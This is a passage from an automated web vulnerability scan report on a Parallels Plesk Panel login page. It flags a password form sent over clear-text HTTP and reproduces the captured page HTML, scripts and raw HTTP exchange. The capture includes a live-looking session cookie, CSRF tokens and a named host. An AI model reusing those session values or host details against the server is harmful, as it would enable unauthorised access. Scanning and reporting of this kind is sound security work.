items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="format-1" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="format-1@vulnerable.host.fqdn" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>format-1@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:11 GMT
Connection: close
Content-Length: 45522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
